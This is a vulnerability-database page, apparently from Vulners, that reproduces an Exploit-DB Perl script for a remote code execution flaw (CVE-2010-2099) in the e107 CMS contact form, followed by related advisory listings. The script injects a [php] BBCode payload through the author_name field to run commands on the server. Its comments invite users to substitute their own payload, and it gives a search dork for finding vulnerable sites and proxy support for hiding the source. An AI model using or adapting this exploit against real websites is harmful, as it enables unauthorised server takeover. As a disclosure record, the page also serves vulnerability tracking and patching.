Lucene search
+L

e107 - Code Exection

🗓️ 24 May 2010 00:00:00Reported by McFlyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 49 Views

e107 Code Execution Vulnerabilit

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2010-2099
24 May 201000:00
circl
checkpoint_advisories
Check Point Advisories
E107 contact php Code Execution (CVE-2010-2099)
10 Nov 201400:00
checkpoint_advisories
cve
CVE
CVE-2010-2099
27 May 201022:00
cve
cvelist
Cvelist
CVE-2010-2099
27 May 201022:00
cvelist
dsquare
Dsquare
e107 0.7.20 RCE
31 Jan 201200:00
dsquare
nessus
Tenable Nessus
e107 BBCode Arbitrary PHP Code Execution
21 May 201000:00
nessus
euvd
EUVD
EUVD-2010-2116
7 Oct 202500:30
euvd
nvd
NVD
CVE-2010-2099
27 May 201022:30
nvd
openvas
OpenVAS
e107 BBCode Arbitrary PHP Code Execution Vulnerability
25 May 201000:00
openvas
prion
Prion
Design/Logic Flaw
27 May 201022:30
prion
Rows per page
# Exploit Title: e107 Code Exec
# Date: 05/22/10
# Author: [email protected]
# Software Link: http://e107.org/edownload.php
# Version: e107 <= 0.7.20
# Tested on: Linux/Windows

#!/usr/bin/perl -w
#################################################
# e107 Code Exec // SploitAuthor: [email protected]
#################################################
# These scrubs still haven't released an update!
# Here is a little bit of motivation for them to
# patch one of the most popular, and insecure of
# the PHP web apps available today.
#################################################
# DORK: inurl:e107_plugins
#################################################

use LWP::UserAgent;

my $path = $ARGV[0] or die("Usage: perl e107_phpbb.pl http://e107site/pathto/contact.php\n");
my $load = 'passthru(chr(105).chr(100))'; # Simple 'id' command. Put ur PHP payload here! :)

# Remove comment for proxy support
my $proxy = 'http://127.0.0.1:8118/';
$ENV{http_proxy} = $proxy ? $proxy: 0;

$ua = new LWP::UserAgent;
$ua->agent("Mozilla/5.0");

if ( $proxy )
{
	print "[*] Using proxy $proxy \n";
	$ua->env_proxy('1');
}

my $req = new HTTP::Request POST => $path;
   $req->content_type('application/x-www-form-urlencoded');
   $req->content("send-contactus=1&author_name=%5Bphp%5D$load%3Bdie%28%29%3B%5B%2Fphp%5D");

my $res = $ua->request($req);
my $data = $res->as_string;

if ( $data =~ /<td class=["']main_section['"]>(.*)/ )
{
	$data = $1;
	print "$data\n";
}
else
{
	print "$data\n";
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 May 2010 00:00Current
5.2Medium risk
Vulners AI Score5.2
CVSS 27.5
EPSS0.04866
49